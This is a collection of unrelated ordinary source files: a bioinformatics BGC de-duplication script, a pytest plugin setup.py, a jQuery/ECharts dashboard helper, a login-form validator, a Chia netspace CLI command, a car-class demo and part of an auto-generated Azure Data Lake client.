subjectName = df.at[index, 'sseqid']
qlength = df.at[index, 'qlen']
subjectLen = df.at[index, 'slen']
if (queryName not in resultDict):
resultDict[queryName] = qlength
if (subjectName not in resultDict):
resultDict[subjectName] = subjectLen
return(resultDict)
def createNetworkGraph(df):
graphtype = nx.Graph()
bgc_network = nx.from_pandas_edgelist(df, source="qseqid", target="sseqid", create_using=graphtype)
subgraphs = list(nx.connected_component_subgraphs(bgc_network, copy=False))
print("Number of hubs:", len(subgraphs))
return (subgraphs)
# Function to find the longest match for a query in terms of sequences length
def findMaxBGC(matchesArray, qlenDict):
maxBGC = None
for match in matchesArray:
if (maxBGC == None):
maxBGC = match
if (qlenDict[maxBGC] < qlenDict[match]):
maxBGC = match
return(maxBGC)
def findUniqueBGCs(subgraphs, bgcList, outdir, outfile, allBGCs):
os.chdir(outdir)
uniqueBGCs = []
all_matches_BGCs = []
for subgraph in subgraphs:
print("======================================================")
print ('networkx subgraph:', subgraph.nodes())
all_matches_BGCs = list(subgraph.nodes()) + all_matches_BGCs
longest_bgc = findMaxBGC(subgraph.nodes(), bgcList)
uniqueBGCs.append(longest_bgc)
print ('Longest BGC in matches:', longest_bgc)
print("======================================================")
bgcs_no_matches = set(allBGCs) - set(all_matches_BGCs) # bgcs that did not find a match based on conditions
bgcs_no_matches_list = list(bgcs_no_matches) # convert to list
combined_unique_bgcs = bgcs_no_matches_list + uniqueBGCs
if len(combined_unique_bgcs) == 0:
print("Error: Could not identify any duplicates from input file")
else:
uniqueKeys_series = pd.Series(combined_unique_bgcs)
uniqueKeys_DF = uniqueKeys_series.to_frame("bgcName")
bgcNameFile = outfile + "_uniqueBGCNames.txt"
uniqueKeys_DF.to_csv(bgcNameFile, index=False,
sep='\t') # write dataframe to csv format (text file) of unique BGCs name
print ('Total unique BGCs:', len(combined_unique_bgcs))
# return unique cluster list to map list to our BGC master list to make a fasta file
return(combined_unique_bgcs)
"""Function to create a fasta file using the list of unique BGCs and map those to the original master bgc fasta file """
def createFastaFile(uniqueBGCList, bgcMasterList, outdir, outfile):
os.chdir(outdir)
fastafileName = outfile + "_uniqueBGCs.fa"
with open(fastafileName, 'w') as uniqueFile:
for seq_record in SeqIO.parse(bgcMasterList, 'fasta'):
if seq_record.id in uniqueBGCList:
seq_record.description = ""
SeqIO.write(seq_record, uniqueFile, "fasta")
else:
continue
uniqueFile.close()
def main(tabular_file, outdir, outfile, perc_identity, coverage_cutoff, bgc_master_file,
tabular_file_header):
statinfo = os.stat(tabular_file)
if statinfo.st_size != 0: #check size of tabular file
unique_qid_array, dfObject = makeDataFrame(tabular_file, tabular_file_header, coverage_cutoff, perc_identity)
query_len_dict = makeLengthDict(dfObject)
query_network_graph = createNetworkGraph(dfObject)
unique_bgc_list = findUniqueBGCs(query_network_graph, query_len_dict, outdir, outfile, unique_qid_array)
createFastaFile(unique_bgc_list, bgc_master_file, outdir, outfile)
else:
print("ERROR: Inputted tabular file is empty.")
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--tabular_file', type=str, required=True, help='blast tabular file results')
parser.add_argument('--outdir', type=str,
help='directory to output files')
parser.add_argument('--outfile', type=str, required=True, help='name of cohort or project')
parser.add_argument('--perc_identity', type=int, required=False, default=95, help='default is 95')
parser.add_argument('--coverage_cutoff', type=int, required=False, default=95, help='default is 95')
parser.add_argument('--bgc_master_file', type=str, required=True,
help='fasta file used for BLAST and de-replication')
parser.add_argument('--tabular_file_header', type=str, required=False,
default="sseqid qseqid slen qlen qcovs pident Evalue qstart qend", help='sseqid qseqid slen qlen qcovs pident Evalue qstart qend')
args = parser.parse_args()
main(args.tabular_file, args.outdir, args.outfile, args.perc_identity, args.coverage_cutoff,
args.bgc_master_file, args.tabular_file_header)
|
from setuptools import setup
with open("README.rst") as readme_file:
readme = readme_file.read()
setup(
name='pytest-describe',
version='2.0.0',
description='Describe-style plugin for pytest',
long_description=readme,
long_description_content_type='text/x-rst',
url='https://github.com/pytest-dev/pytest-describe',
author='Robin Pedersen',
author_email='robinpeder@gmail.com',
license='MIT license',
install_requires=[
'pytest>=4.0.0',
],
entry_points={
'pytest11': [
'pytest-describe = pytest_describe.plugin'
],
},
packages=['pytest_describe'],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Libraries',
'Topic :: Utilities',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
)
|
document.write("<script src='js/function.js'></script>");
document.write("<script src='js-unit/jquery-easyui/plugins/jquery.pagination.js'></script>");
$.extend({
initTable: function(domObject, options) {
var _op = $.extend({
width: '920',
pagination: true,
columns: [],
data: [],
queryParams: {},
title: false,
fitColumns: true,
singleSelect: false, //是否只允许选中一行
// rownumbers: false,
striped: true,
method: 'get',
loadMsg: '数据加载中.....',
showFooter: true,
pageSize: 30,
pageList: [20, 30, 50, 100],//可以设置每页记录条数的列表
onLoadSuccess: function () {
}
}, options);
$(domObject).datagrid(_op);
if (_op.pagination === true) {
$(domObject).datagrid('getPager').pagination({
beforePageText: '第',//页数文本框前显示的汉字
afterPageText: '页 共 {pages} 页',
displayMsg: '当前显示 {from} - {to} 条记录 共 {total} 条记录'
});
}
}
});
var EchartsDIY = {
startTime: '',
endTime: '',
showId: '',
data: '',
dateLineUrl: '',
pieChartUrl: '',
barChartUrl: '',
topList: [],
directSubTopUrl: '',
dateLineOptions: {
title: {
text: ''
},
tooltip: {
trigger: 'axis',
axisPointer: {
animation: false
}
},
xAxis: {
type: 'time',
splitLine: {
show: false
}
},
yAxis: {
type: 'value',
boundaryGap: [0, '100%'],
splitLine: {
show: false
}
},
series: [{
name: '新增下级:',
type: 'line',
showSymbol: false,
hoverAnimation: false,
data: []
}]
},
pieOptions : {
title : {
text: '',
subtext: '',
x:'center'
},
tooltip : {
trigger: 'item',
},
legend: {
orient: 'vertical',
left: 'left',
data: []
},
series : [
{
name: '',
type: 'pie',
radius : '55%',
center: ['50%', '60%'],
data:[],
itemStyle: {
emphasis: {
shadowBlur: 10,
shadowOffsetX: 0,
shadowColor: 'rgba(0, 0, 0, 0.5)'
}
}
}
]
},
barOptions: {
color: ['#3398DB'],
tooltip : {
trigger: 'axis',
axisPointer : { // 坐标轴指示器,坐标轴触发有效
type : 'shadow' // 默认为直线,可选为:'line' | 'shadow'
}
},
grid: {
left: '3%',
right: '4%',
bottom: '30%',
containLabel: true
},
xAxis : [
{
type : 'category',
data : [],
axisTick: {
alignWithLabel: true
},
axisLabel: {
interval: 0,
rotate: 60
}
}
],
yAxis : [
{
type : 'value'
}
],
series : [
{
name:'',
type:'bar',
barWidth: '60%',
data:[]
}
]
},
init: function() {
},
/**
* 初始化时间线坐标图
*/
initDateLine: function(){
this.init();
this._renderDateLine();
},
_renderDateLine: function(){
this._getDateLineData();
var myChart = echarts.init(document.getElementById('newAddSubLevel'));
this.dateLineOptions.series[0].data = this.data;
myChart.setOption(this.dateLineOptions);
this._renderDirectSubTop();
},
_renderDirectSubTop: function() {
this._getDirectSubTop();
var html = '';
$.each(this.topList, function(k, v){
html += "<tr>";
html += "<td>" +(k + 1)+ "</td>";
html += "<td>" + v.newNums + "</td>";
html += "<td>" + v.directName + "</td>";
html += "</tr>";
});
$("#js-sub-top-table").find("tbody").html('').append(html);
},
_getDirectSubTop: function(){
var _this = this;
$.ajax({
url: _this.directSubTopUrl,
type: "post",
dataType: "json",
data: {startTime: _this.startTime, endTime: _this.endTime},
success: function (data) {
_this.topList = data.data;
}
});
},
_getDateLineData: function(){
var _this = this;
$.ajax({
url: _this.dateLineUrl,
type: "post",
dataType: "json",
async: false,
data: {startTime: _this.startTime, endTime: _this.endTime},
success: function (data) {
_this.data = data.data;
}
});
},
/**
* 初始化饼状图坐标图
*/
initPieChart: function(){
this.init();
this._renderPieChart();
},
_renderPieChart: function(){
this._getPieChartData();
var myChart = echarts.init(document.getElementById('noActiveRate'));
this.pieOptions.series[0].data = this.data;
myChart.setOption(this.pieOptions);
},
_getPieChartData: function(){
this._getDate();
var _this = this;
_this.pieOptions.legend.data = [];
$.ajax({
url: _this.pieChartUrl,
type: "post",
dataType: "json",
data: {startTime: _this.startTime, endTime: _this.endTime},
success: function (data) {
_this.data = data.data;
$.each (data.data, function(k, v) {
_this.pieOptions.legend.data.push(v.name);
});
}
});
},
/**
* 初始化柱状图坐标图
*/
initBarChart: function(){
this.init();
this._renderBarChart();
},
_renderBarChart: function(){
this._getBarChartData();
var myChart = echarts.init(document.getElementById('subLevelPlay'));
myChart.setOption(this.barOptions);
},
_getBarChartData: function(){
this._getDate();
var _this = this;
_this.barOptions.xAxis[0].data = [];
_this.barOptions.series[0].data = [];
$.ajax({
url: _this.barChartUrl,
type: "post",
dataType: "json",
async: false,
data: {startTime: _this.startTime, endTime: _this.endTime},
success: function (data) {
$.each (data.data, function(k, v) {
_this.barOptions.series[0].name = '玩彩情况:';
_this.barOptions.xAxis[0].data.push(v.name);
_this.barOptions.series[0].data.push(v.value);
});
}
});
},
};
var DataTime = {
format: "yyyy-mm-dd hh:ii:ss",
minView: "hour",
startTime: "",
endTime: "",
init: function(){
var _this = this;
$(".form_start_datetime").datetimepicker("remove");
$(".form_end_datetime").datetimepicker("remove");
// console.log(this.format);
$(".form_start_datetime").datetimepicker({
minView: _this.minView,
language: 'zh-CN',
autoclose:true,
format: _this.format,
todayHighlight: true
}).on("click",function(){
$(this).datetimepicker("setEndDate", $(this).next('.form_end_datetime').val());
if (_this.startTime != '') {
$(this).datetimepicker("setStartDate", _this.startTime)
}
});
$(".form_end_datetime").datetimepicker({
minView: _this.minView,
language: 'zh-CN',
autoclose:true,
format: _this.format,
todayHighlight: true
}).on("click",function(){
$(this).datetimepicker("setStartDate", $(this).prev(".form_start_datetime").val());
$(this).datetimepicker("setEndDate", new Date)
});
},
setFormat: function (format, minView) {
this.format = format;
this.minView = minView;
},
setStartTime: function (startTime) {
this.startTime = startTime;
}
};
var TableGrids = {
id: '',
data: [],
url : '',
columns: [],
queryParams: {},
pagination: true,
showFooter: true,
onLoadSuccess: function(){},
exampleTable: {
url : "#",
columns : [
[
{field: 'fieldOne', width: 110, title: '第一列', sortable: false, align: 'center', frozen: true},
{field: 'fieldTwo', width: 80, title: '第二列', sortable: false, align: 'center', frozen: true},
{field: 'fieldThree', width: 80, title: '第三列', sortable: false, align: 'center', frozen: true},
]
]
},
showTable : function (){
var _this = this;
$.initTable(_this.id, {
url: _this.url,
data: [],
columns: _this.columns,
queryParams: _this.queryParams,
pagination: _this.pagination,
showFooter: _this.showFooter,
onLoadSuccess: _this.onLoadSuccess
});
},
_loadTable: function(){
var _this = this;
$(_this.id).datagrid('load', _this.queryParams);
},
init: function(initFn, id) {
eval('this.' + initFn + '(\''+id+'\')');
this.showTable();
},
/*
* 初始化游戏记录 投注记录报表
*
*/
initExampleTable: function(id) {
this.columns = this.exampleTable.columns;
this.url = this.exampleTable.url;
this.id = id;
this.pagination = true;
this.showFooter = true;
this._getTableParams();
this._bindSearchEvent();
this._bindDateSpeed('#startTime', "#endTime");
},
_bindSearchEvent: function (){
var _this = this;
$("#searchButton").unbind("click").bind("click", function(){
_this._getTableParams();
_this._loadTable();
});
},
_getTableParams: function(){
this.queryParams = {
};
},
/**
* 绑定日期选择按钮
* @param startTimeId
* @param endTimeId
* @private
*/
_bindDateSpeed: function(startTimeId, endTimeId){
var _this = this;
$(".js-date-speed").unbind("click").bind("click", function(){
_this.queryParams.startTime = $(this).attr("data-start-date");
_this.queryParams.endTime = $(this).attr("data-end-date");
$(startTimeId).val(_this.queryParams.startTime);
$(endTimeId).val(_this.queryParams.endTime);
_this._loadTable();
});
}
};
|
"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
const tslib_1 = require("tslib");
//Exports all handler functions
(0, tslib_1.__exportStar)(require("./mappings/mappingHandlers"), exports);
|
$(document).on('submit','form.form-signin',function(e){
//check campo nickname
var nickname = $('input#nickname').val();
if ( nickname == '' ) {
alert('Escribe tu Usuario');
$('input#nickname').focus();
return false;
};
//check campo password
var password = $('input#password').val();
if ( password == '' ) {
alert('Escribe tu Contraseña');
$('input#password').focus();
return false;
};
//si todo está bien entonces submit
});
|
import click
@click.command("netspace", short_help="Estimate total farmed space on the network")
@click.option(
"-p",
"--rpc-port",
help=(
"Set the port where the Full Node is hosting the RPC interface. "
"See the rpc_port under full_node in config.yaml. "
"[default: 8555]"
),
type=int,
default=None,
)
@click.option(
"-d",
"--delta-block-height",
help=(
"Compare a block X blocks older to estimate total network space. "
"Defaults to 4608 blocks (~1 day) and Peak block as the starting block. "
"Use --start BLOCK_HEIGHT to specify starting block. "
"Use 192 blocks to estimate over the last hour."
),
type=str,
default="4608",
)
@click.option(
"-s",
"--start",
help="Newest block used to calculate estimated total network space. Defaults to Peak block.",
type=str,
default="",
)
def netspace_cmd(rpc_port: int, delta_block_height: str, start: str) -> None:
"""
Calculates the estimated space on the network given two block header hashes.
"""
import asyncio
from .netspace_funcs import netstorge_async
asyncio.run(netstorge_async(rpc_port, delta_block_height, start))
|
import car_all as car
my_beetle = car.Car('volkswagen', 'beetle', 2016)
print(my_beetle.get_descriptive_name())
my_tesla = car.ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, IO, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PathOperations(object):
"""PathOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.storage.filedatalake.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def create(
self,
request_id_parameter=None, # type: Optional[str]
timeout=None, # type: Optional[int]
resource=None, # type: Optional[Union[str, "_models.PathResourceType"]]
continuation=None, # type: Optional[str]
mode=None, # type: Optional[Union[str, "_models.PathRenameMode"]]
rename_source=None, # type: Optional[str]
source_lease_id=None, # type: Optional[str]
properties=None, # type: Optional[str]
permissions=None, # type: Optional[str]
umask=None, # type: Optional[str]
path_http_headers=None, # type: Optional["_models.PathHTTPHeaders"]
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"]
source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Create File | Create Directory | Rename File | Rename Directory.
Create or rename a file or directory. By default, the destination is overwritten and if the
destination already exists and has a lease the lease is broken. This operation supports
conditional HTTP requests. For more information, see `Specifying Conditional Headers for Blob
Service Operations <https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-
conditional-headers-for-blob-service-operations>`_. To fail if the destination already exists,
use a conditional request with If-None-Match: "*".
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param resource: Required only for Create File and Create Directory. The value must be "file"
or "directory".
:type resource: str or ~azure.storage.filedatalake.models.PathResourceType
:param continuation: Optional. When deleting a directory, the number of paths that are deleted
with each invocation is limited. If the number of paths to be deleted exceeds this limit, a
continuation token is returned in this response header. When a continuation token is returned
in the response, it must be specified in a subsequent invocation of the delete operation to
continue deleting the directory.
:type continuation: str
:param mode: Optional. Valid only when namespace is enabled. This parameter determines the
behavior of the rename operation. The value must be "legacy" or "posix", and the default value
will be "posix".
:type mode: str or ~azure.storage.filedatalake.models.PathRenameMode
:param rename_source: An optional file or directory to be renamed. The value must have the
following format: "/{filesystem}/{path}". If "x-ms-properties" is specified, the properties
will overwrite the existing properties; otherwise, the existing properties will be preserved.
This value must be a URL percent-encoded string. Note that the string may only contain ASCII
characters in the ISO-8859-1 character set.
:type rename_source: str
:param source_lease_id: A lease ID for the source path. If specified, the source path must have
an active lease and the lease ID must match.
:type source_lease_id: str
:param properties: Optional. User-defined properties to be stored with the filesystem, in the
format of a comma-separated list of name and value pairs "n1=v1, n2=v2, ...", where each value
is a base64 encoded string. Note that the string may only contain ASCII characters in the
ISO-8859-1 character set. If the filesystem exists, any properties not included in the list
will be removed. All properties are removed if the header is omitted. To merge new and
existing properties, first get all existing properties and the current E-Tag, then make a
conditional request with the E-Tag and include values for all properties.
:type properties: str
:param permissions: Optional and only valid if Hierarchical Namespace is enabled for the
account. Sets POSIX access permissions for the file owner, the file owning group, and others.
Each class may be granted read, write, or execute permission. The sticky bit is also
supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported.
:type permissions: str
:param umask: Optional and only valid if Hierarchical Namespace is enabled for the account.
When creating a file or directory and the parent folder does not have a default ACL, the umask
restricts the permissions of the file or directory to be created. The resulting permission is
given by p bitwise and not u, where p is the permission and u is the umask. For example, if p
is 0777 and u is 0057, then the resulting permission is 0720. The default permission is 0777
for a directory and 0666 for a file. The default umask is 0027. The umask must be specified
in 4-digit octal notation (e.g. 0766).
:type umask: str
:param path_http_headers: Parameter group.
:type path_http_headers: ~azure.storage.filedatalake.models.PathHTTPHeaders
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
:param source_modified_access_conditions: Parameter group.
:type source_modified_access_conditions: ~azure.storage.filedatalake.models.SourceModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_cache_control = None
_content_encoding = None
_content_language = None
_content_disposition = None
_content_type = None
_lease_id = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
_source_if_match = None
_source_if_none_match = None
_source_if_modified_since = None
_source_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
if path_http_headers is not None:
_cache_control = path_http_headers.cache_control
_content_encoding = path_http_headers.content_encoding
_content_language = path_http_headers.content_language
_content_disposition = path_http_headers.content_disposition
_content_type = path_http_headers.content_type
if source_modified_access_conditions is not None:
_source_if_match = source_modified_access_conditions.source_if_match
_source_if_none_match = source_modified_access_conditions.source_if_none_match
_source_if_modified_since = source_modified_access_conditions.source_if_modified_since
_source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since
accept = "application/json"
# Construct URL
url = self.create.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
if resource is not None:
query_parameters['resource'] = self._serialize.query("resource", resource, 'str')
if continuation is not None:
query_parameters['continuation'] = self._serialize.query("continuation", continuation, 'str')
if mode is not None:
query_parameters['mode'] = self._serialize.query("mode", mode, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if _cache_control is not None:
header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", _cache_control, 'str')
if _content_encoding is not None:
header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", _content_encoding, 'str')
if _content_language is not None:
header_parameters['x-ms-content-language'] = self._serialize.header("content_language", _content_language, 'str')
if _content_disposition is not None:
header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", _content_disposition, 'str')
if _content_type is not None:
header_parameters['x-ms-content-type'] = self._serialize.header("content_type", _content_type, 'str')
if rename_source is not None:
header_parameters['x-ms-rename-source'] = self._serialize.header("rename_source", rename_source, 'str')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if source_lease_id is not None:
header_parameters['x-ms-source-lease-id'] = self._serialize.header("source_lease_id", source_lease_id, 'str')
if properties is not None:
header_parameters['x-ms-properties'] = self._serialize.header("properties", properties, 'str')
if permissions is not None:
header_parameters['x-ms-permissions'] = self._serialize.header("permissions", permissions, 'str')
if umask is not None:
header_parameters['x-ms-umask'] = self._serialize.header("umask", umask, 'str')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
if _source_if_match is not None:
header_parameters['x-ms-source-if-match'] = self._serialize.header("source_if_match", _source_if_match, 'str')
if _source_if_none_match is not None:
header_parameters['x-ms-source-if-none-match'] = self._serialize.header("source_if_none_match", _source_if_none_match, 'str')
if _source_if_modified_since is not None:
header_parameters['x-ms-source-if-modified-since'] = self._serialize.header("source_if_modified_since", _source_if_modified_since, 'rfc-1123')
if _source_if_unmodified_since is not None:
header_parameters['x-ms-source-if-unmodified-since'] = self._serialize.header("source_if_unmodified_since", _source_if_unmodified_since, 'rfc-1123')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
if cls:
return cls(pipeline_response, None, response_headers)
create.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def update(
self,
action, # type: Union[str, "_models.PathUpdateAction"]
mode, # type: Union[str, "_models.PathSetAccessControlRecursiveMode"]
body, # type: IO
request_id_parameter=None, # type: Optional[str]
timeout=None, # type: Optional[int]
max_records=None, # type: Optional[int]
continuation=None, # type: Optional[str]
force_flag=None, # type: Optional[bool]
position=None, # type: Optional[int]
retain_uncommitted_data=None, # type: Optional[bool]
close=None, # type: Optional[bool]
content_length=None, # type: Optional[int]
properties=None, # type: Optional[str]
owner=None, # type: Optional[str]
group=None, # type: Optional[str]
permissions=None, # type: Optional[str]
acl=None, # type: Optional[str]
path_http_headers=None, # type: Optional["_models.PathHTTPHeaders"]
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"]
**kwargs # type: Any
):
# type: (...) -> Optional["_models.SetAccessControlRecursiveResponse"]
"""Append Data | Flush Data | Set Properties | Set Access Control.
Uploads data to be appended to a file, flushes (writes) previously uploaded data to a file,
sets properties for a file or directory, or sets access control for a file or directory. Data
can only be appended to a file. This operation supports conditional HTTP requests. For more
information, see `Specifying Conditional Headers for Blob Service Operations
<https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-
blob-service-operations>`_.
:param action: The action must be "append" to upload data to be appended to a file, "flush" to
flush previously uploaded data to a file, "setProperties" to set the properties of a file or
directory, "setAccessControl" to set the owner, group, permissions, or access control list for
a file or directory, or "setAccessControlRecursive" to set the access control list for a
directory recursively. Note that Hierarchical Namespace must be enabled for the account in
order to use access control. Also note that the Access Control List (ACL) includes permissions
for the owner, owning group, and others, so the x-ms-permissions and x-ms-acl request headers
are mutually exclusive.
:type action: str or ~azure.storage.filedatalake.models.PathUpdateAction
:param mode: Mode "set" sets POSIX access control rights on files and directories, "modify"
modifies one or more POSIX access control rights that pre-exist on files and directories,
"remove" removes one or more POSIX access control rights that were present earlier on files
and directories.
:type mode: str or ~azure.storage.filedatalake.models.PathSetAccessControlRecursiveMode
:param body: Initial data.
:type body: IO
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param max_records: Optional. Valid for "SetAccessControlRecursive" operation. It specifies the
maximum number of files or directories on which the acl change will be applied. If omitted or
greater than 2,000, the request will process up to 2,000 items.
:type max_records: int
:param continuation: Optional. The number of paths processed with each invocation is limited.
If the number of paths to be processed exceeds this limit, a continuation token is returned in
the response header x-ms-continuation. When a continuation token is returned in the response,
it must be percent-encoded and specified in a subsequent invocation of setAcessControlRecursive
operation.
:type continuation: str
:param force_flag: Optional. Valid for "SetAccessControlRecursive" operation. If set to false,
the operation will terminate quickly on encountering user errors (4XX). If true, the operation
will ignore user errors and proceed with the operation on other sub-entities of the directory.
Continuation token will only be returned when forceFlag is true in case of user errors. If not
set the default value is false for this.
:type force_flag: bool
:param position: This parameter allows the caller to upload data in parallel and control the
order in which it is appended to the file. It is required when uploading data to be appended
to the file and when flushing previously uploaded data to the file. The value must be the
position where the data is to be appended. Uploaded data is not immediately flushed, or
written, to the file. To flush, the previously uploaded data must be contiguous, the position
parameter must be specified and equal to the length of the file after all data has been
written, and there must not be a request entity body included with the request.
:type position: long
:param retain_uncommitted_data: Valid only for flush operations. If "true", uncommitted data
is retained after the flush operation completes; otherwise, the uncommitted data is deleted
after the flush operation. The default is false. Data at offsets less than the specified
position are written to the file when flush succeeds, but this optional parameter allows data
after the flush position to be retained for a future flush operation.
:type retain_uncommitted_data: bool
:param close: Azure Storage Events allow applications to receive notifications when files
change. When Azure Storage Events are enabled, a file changed event is raised. This event has a
property indicating whether this is the final change to distinguish the difference between an
intermediate flush to a file stream and the final close of a file stream. The close query
parameter is valid only when the action is "flush" and change notifications are enabled. If the
value of close is "true" and the flush operation completes successfully, the service raises a
file change notification with a property indicating that this is the final update (the file
stream has been closed). If "false" a change notification is raised indicating the file has
changed. The default is false. This query parameter is set to true by the Hadoop ABFS driver to
indicate that the file stream has been closed.".
:type close: bool
:param content_length: Required for "Append Data" and "Flush Data". Must be 0 for "Flush
Data". Must be the length of the request content in bytes for "Append Data".
:type content_length: long
:param properties: Optional. User-defined properties to be stored with the filesystem, in the
format of a comma-separated list of name and value pairs "n1=v1, n2=v2, ...", where each value
is a base64 encoded string. Note that the string may only contain ASCII characters in the
ISO-8859-1 character set. If the filesystem exists, any properties not included in the list
will be removed. All properties are removed if the header is omitted. To merge new and
existing properties, first get all existing properties and the current E-Tag, then make a
conditional request with the E-Tag and include values for all properties.
:type properties: str
:param owner: Optional. The owner of the blob or directory.
:type owner: str
:param group: Optional. The owning group of the blob or directory.
:type group: str
:param permissions: Optional and only valid if Hierarchical Namespace is enabled for the
account. Sets POSIX access permissions for the file owner, the file owning group, and others.
Each class may be granted read, write, or execute permission. The sticky bit is also
supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported.
:type permissions: str
:param acl: Sets POSIX access control rights on files and directories. The value is a comma-
separated list of access control entries. Each access control entry (ACE) consists of a scope,
a type, a user or group identifier, and permissions in the format
"[scope:][type]:[id]:[permissions]".
:type acl: str
:param path_http_headers: Parameter group.
:type path_http_headers: ~azure.storage.filedatalake.models.PathHTTPHeaders
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
